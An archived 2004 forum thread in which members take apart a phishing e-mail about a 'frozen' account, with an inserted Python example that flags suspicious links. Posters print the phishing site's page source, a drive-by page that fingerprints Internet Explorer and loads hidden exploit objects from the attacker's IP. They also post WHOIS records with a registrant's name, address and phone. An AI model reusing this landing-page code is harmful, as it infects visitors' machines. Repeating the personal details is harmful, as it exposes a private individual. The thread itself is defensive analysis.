IWETHEY

A sneaky Spam just received
Subject: Your email account frozen!
Mime-Version: 1.0
Content-Type: text/html; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Status:

<HTML>
<BODY>
Good day,<BR><BR>

Our e-mail service was unavalaible April 17 at 5.00am - 8.00am.<BR>
After this problem your e-mail account was frozen(you can`t send or receive
messages),<BR>
to re-activate e-mail click <A href="http://161.58.140.37/">here</a><BR><BR>
<BR>

- -<BR>
Sincerely,<BR>
E-mail Admin.<BR>

</BODY>
</HTML>

*************************************************************************
If anyone can pinpoint the IP address of this I would be interested to hear the results (it is usually a waste of time trying to traceroute it from here).

Doug Marker
Edited by dmarker April 19, 2004, 12:58:21 AM EDT
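The check a mail filter would apply to a message like the one quoted above, as an added example (this is not code from the thread): it parses the raw message, pulls every link out of the HTML body, and flags targets whose host is a bare IP literal, whose host is not under the sender's domain, or whose visible URL differs from the real target. The body is a copy of the spam posted above; the From and To headers are assumptions added so that the sample parses as a complete message.

```python
"""Flag suspicious links in a suspected phishing e-mail (added example, not from the thread)."""
import re
import ipaddress
from email import message_from_string, policy, utils
from urllib.parse import urlparse

# Constructed sample: the body is the spam quoted upthread; the From/To
# headers are assumptions so that the message parses as a complete e-mail.
RAW_MESSAGE = """\
From: "E-mail Admin" <admin@example.net>
To: user@example.net
Subject: Your email account frozen!
Mime-Version: 1.0
Content-Type: text/html; charset=iso-8859-1
Content-Transfer-Encoding: 8bit

<HTML>
<BODY>
Good day,<BR><BR>
Our e-mail service was unavalaible April 17 at 5.00am - 8.00am.<BR>
After this problem your e-mail account was frozen(you can`t send or receive
messages),<BR>
to re-activate e-mail click <A href="http://161.58.140.37/">here</a><BR><BR>
Sincerely,<BR>
E-mail Admin.<BR>
</BODY>
</HTML>
"""

# Anchor tags with an href; group 1 is the target, group 2 the visible text.
LINK_RE = re.compile(r'<a\s[^>]*?href\s*=\s*["\']?([^"\'\s>]+)[^>]*>(.*?)</a>',
                     re.IGNORECASE | re.DOTALL)
TAG_RE = re.compile(r"<[^>]+>")


def is_ip_literal(host):
    """True for hosts such as 161.58.140.37 or [::1]; throwaway kits often have no domain."""
    try:
        ipaddress.ip_address(host.strip("[]"))
        return True
    except ValueError:
        return False


def same_site(host, domain):
    """True when host is the sender's domain or a subdomain of it."""
    return bool(domain) and (host == domain or host.endswith("." + domain))


def triage_links(raw_message):
    """Return one record per link with the reasons it looks suspicious."""
    msg = message_from_string(raw_message, policy=policy.default)
    body = msg.get_body(preferencelist=("html",))
    html = body.get_content() if body is not None else ""
    sender_domain = utils.parseaddr(msg.get("From", ""))[1].rpartition("@")[2].lower()
    records = []
    for href, inner in LINK_RE.findall(html):
        host = (urlparse(href).hostname or "").lower()
        text = TAG_RE.sub("", inner).strip()
        flags = []
        if is_ip_literal(host):
            flags.append("target host is a bare IP address")
        elif host and not same_site(host, sender_domain):
            flags.append("target host is not under the sender's domain")
        # A visible URL that differs from the real target is the classic decoy.
        shown = re.search(r"https?://([^/\s]+)", text)
        if shown and shown.group(1).lower() != host:
            flags.append("visible URL does not match the target")
        records.append({"href": href, "text": text, "host": host, "flags": flags})
    return records


if __name__ == "__main__":
    for r in triage_links(RAW_MESSAGE):
        print(r["href"], "->", r["flags"] or "ok")
```

Run as a script it prints the single link in the sample with its flag. The sender-domain comparison only means anything when the From header is trustworthy, which in a phishing message it is not; the bare-IP and decoy-URL checks do not depend on it.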
Re: A sneaky Spam just received
From a Winblows box:

Tracing route to www.sienestr.com [161.58.140.37]
over a maximum of 30 hops:

  1     2 ms     1 ms     2 ms  c-24-16-231-252.client.comcast.net [24.16.231.252]
  2     *        *        *     Request timed out.
  3    10 ms    11 ms    16 ms  12.244.21.145
  4    11 ms    11 ms    13 ms  12.244.72.18
  5    12 ms    23 ms    11 ms  tbr1-p012402.st6wa.ip.att.net [12.122.5.174]
  6    31 ms    32 ms    28 ms  tbr2-cl1.sffca.ip.att.net [12.122.12.113]
  7    26 ms    26 ms    30 ms  ggr2-p390.sffca.ip.att.net [12.123.13.194]
  8    28 ms    28 ms    28 ms  p16-0-1-1.r20.plalca01.us.bb.verio.net [129.250.9.73]
  9    83 ms    83 ms    83 ms  p16-0-1-3.r21.asbnva01.us.bb.verio.net [129.250.2.193]
 10    92 ms    84 ms    81 ms  p64-0-0-0.r20.asbnva01.us.bb.verio.net [129.250.2.34]
 11    94 ms    86 ms    86 ms  ge-0-0-0.r00.stngva01.us.wh.verio.net [129.250.27.187]
 12    83 ms    85 ms    81 ms  204.2.125.106
 13    84 ms    84 ms    87 ms  www.sienestr.com [161.58.140.37]

Trace complete.
Nobody wins in a butter eating contest
More info
Domain Name.......... sienestr.com
Creation Date........ 2004-04-17
Registration Date.... 2004-04-17
Expiry Date.......... 2014-04-17
Organisation Name.... Toofy company
Organisation Address. 1840 Mt Ephraim Rd
Organisation Address.
Organisation Address. Adamstown
Organisation Address. 21710
Organisation Address. MD
Organisation Address. UNITED STATES
Admin Name........... David Toof
Admin Address........ 1840 Mt Ephraim Rd
Admin Address........
Admin Address........ Adamstown
Admin Address........ 21710
Admin Address........ MD
Admin Address........ UNITED STATES
Admin Email.......... dave_toof@yahoo.com
Admin Phone.......... (301)8745311
Admin Fax............
Tech Name............ Verio Hostmaster
Tech Address......... 5050 Blue Lake Dr.
Tech Address.........
Tech Address......... Boca Raton
Tech Address......... 33431
Tech Address......... FL
Tech Address......... UNITED STATES
Tech Email........... hostmaster@VERIO-HOSTING.COM
Tech Phone........... 888-663-6648
Tech Fax.............
Name Server.......... ns19a.nameservers.net
Name Server.......... ns19b.nameservers.net
Was anyone game to visit the site with a browser :-)

I used 1 machine to access the web server but immediately got a message 'loading' in the middle of the screen & killed it.

Didn't have the time & wasn't prepared enough for evaluating the damage the site might be up to. My guess is it would be a spyware site that loads (if it can) spyware.

Later tonight I might do a controlled experiment using a Virtual PC & will let you know what transpires.

Doug M
I did.
Mozilla on Linux - just said that 'my account' was restored.

Imric's Tips for Living
  • Paranoia Is a Survival Trait
  • Pessimists are never disappointed - but sometimes, if they are very lucky, they can be pleasantly surprised...
  • Even though everyone is out to get you, it doesn't matter unless you let them win.


Nothing is as simple as it seems in the beginning,
As hopeless as it seems in the middle,
Or as finished as it seems in the end.
Page source for main page:
<HTML xmlns:IE>
<TITLE>Loading...</TITLE>
    <HEAD>
         <STYLE type='text/css'>
            IE:clientCaps {behavior:url(#default#clientcaps)}
         </STYLE>

         <SCRIPT language="JavaScript">

            function GetVersion(CLSID)
            {
              if (oClientCaps.isComponentInstalled(CLSID,"ComponentID"))
                 {return oClientCaps.getComponentVersion(CLSID,"ComponentID").split(",");}
              else
                 {return Array(0,0,0,0);}
            }
         </SCRIPT>
<meta http-equiv="refresh" content="3; url=thx.html">
    </HEAD>
<BODY>
 <img src="http://161.58.140.37/cgi-local/userstat.cgi" width="1" height="1">
     <IE:clientCaps ID="oClientCaps" />

     <SCRIPT language="JavaScript">
           if (navigator.appName=="Microsoft Internet Explorer")
           {
              var IEversion=navigator.appVersion;
              var IEplatform=navigator.platform;
              if (IEplatform.search("Win32") != -1)
              {
                 if (IEversion.search("MSIE 5.0") != -1)
                 {
     document.write('<object data="http://161.58.140.37/cgi-local/htmlhelp.cgi" style="display:none"></object>');
                 }
                 if (IEversion.search("MSIE 5.5") != -1)
                 {
     document.write('<object data="http://161.58.140.37/cgi-local/htmlhelp.cgi" style="display:none"></object>');
                 }
                 if (IEversion.search("MSIE 6.0") != -1)
                 {
                    var Version_IE  = GetVersion("{89820200-ECBD-11CF-8B85-00AA005B4383}");
                    PatchList = clientInformation.appMinorVersion;
                    document.write('<iframe src="http://161.58.140.37/cgi-local/ie.cgi?vers='+Version_IE+PatchList+'"style="display:none"></iframe>');
     document.write('<object data="http://161.58.140.37/cgi-local/htmlhelp.cgi" style="display:none"></object>');

                 }
              }
           }

      </SCRIPT>
<BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><H2>
<CENTER>
<B>Loading....</B></CENTER></H2>

</BODY>
</HTML>
Nobody wins in a butter eating contest
HTML help exploit?
Looks like it is trying to take advantage of one of the many local execution errors common in IE - does not appear to do anything to Mozilla.
Nobody wins in a butter eating contest
Page source for thx.html
<HTML>
<TITLE>Thank you!</TITLE>
    <HEAD>
         <STYLE type='text/css'>
            IE:clientCaps {behavior:url(#default#clientcaps)}
         </STYLE>
    </HEAD>
<BODY>
 <BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR>
<CENTER><B>Thank you!<BR><BR>
Now your e-mail account re-activated!<BR>

Sincerely,<BR>
E-mail Admin.<BR>
</B></CENTER>

</BODY>
</HTML>
Nobody wins in a butter eating contest
     SPAM Question - (gdaustin) - (31)
         A sneaky Spam just received - (dmarker) - (7)
             Re: A sneaky Spam just received - (inthane-chan) - (6)
                 More info - (jbrabeck) - (5)
                     Was anyone game to visit the site with a browser :-) - (dmarker) - (4)
                         I did. - (imric)
                         Page source for main page: - (inthane-chan) - (1)
                             HTML help exploit? - (inthane-chan)
                         Page source for thx.html - (inthane-chan)